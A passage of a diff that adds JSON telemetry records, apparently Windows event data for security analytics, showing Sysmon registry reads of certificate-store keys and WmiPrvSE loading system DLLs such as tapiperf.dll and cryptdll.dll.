"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "tapiperf.dll", + "image_path": "C:\\Windows\\System32\\tapiperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "perfctrs.dll", + "image_path": "C:\\Windows\\System32\\perfctrs.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "tquery.dll", + "image_path": "C:\\Windows\\System32\\tquery.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "cryptdll.dll", + "image_path": "C:\\Windows\\System32\\cryptdll.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 